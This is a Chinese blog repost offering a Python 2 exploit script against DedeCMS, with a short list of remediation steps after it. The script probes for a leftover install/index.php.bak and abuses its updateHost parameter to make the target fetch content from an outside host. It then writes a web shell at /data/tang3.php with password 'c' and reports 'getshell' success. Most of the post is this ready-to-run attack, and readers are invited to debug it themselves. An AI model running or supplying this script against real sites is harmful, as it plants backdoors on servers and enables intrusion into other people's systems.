python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python)
織夢(mèng)CMS漏洞,就好比女人的大姨媽,每個(gè)月不來(lái)上一次,這就算是內(nèi)分泌失調(diào)。代碼是用python寫(xiě)的,小伙伴們自行調(diào)試吧!在前段時(shí)間,織夢(mèng)爆出了一個(gè)遠(yuǎn)程文件包含漏洞。呃,感謝hoseph同學(xué)提供的代碼吧。寫(xiě)的很不錯(cuò)!修復(fù)此漏洞方法,請(qǐng)見(jiàn)文章底部。
#! /usr/bin/env python
#coding=utf-8
#Joseph(小續(xù))
import requests
import sys
import re
def main():
try:
url="http://"+sys.argv[1].strip('http://')
except IndexError:
print '''
poc: dede.py [url]http://www.baidu.com/[/url]
'''
payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
urlpoc=url+payload
code=requests.get(urlpoc).status_code
if code==200:
print u"恭喜存在此漏洞"
print u"Ongoing attacks--->>>>>"
exploit(url)
pass
else:
print u"sorry 漏洞正在掙扎"
pass
def exploit(url):
urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"
htmlcontent=requests.get(urlpoc).content
Probe=re.compile(r'存在')
if Probe.findall(htmlcontent):
print u'''
ver:getshell成功
shell:url+/data/tang3.php?a=0 ?密碼為:c
'''
pass
else:
print u"請(qǐng)看遠(yuǎn)程地址是否已經(jīng)不可用"
pass
if __name__ == '__main__':
main()
修復(fù)方法:
1、建議安裝完成后,刪除(改名)install文件夾。
2、給data文件夾改名,或者移動(dòng)位置。
3、到織夢(mèng)后臺(tái),升級(jí)到最新的版本
4、官方網(wǎng)站下載最新補(bǔ)丁包手動(dòng)更新到最新版本。
5、不用謝!
總結(jié)
以上是生活随笔為你收集整理的python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: uuid怎么获取_我们经常说的限流应该怎
- 下一篇: python指定数据写入指定excel_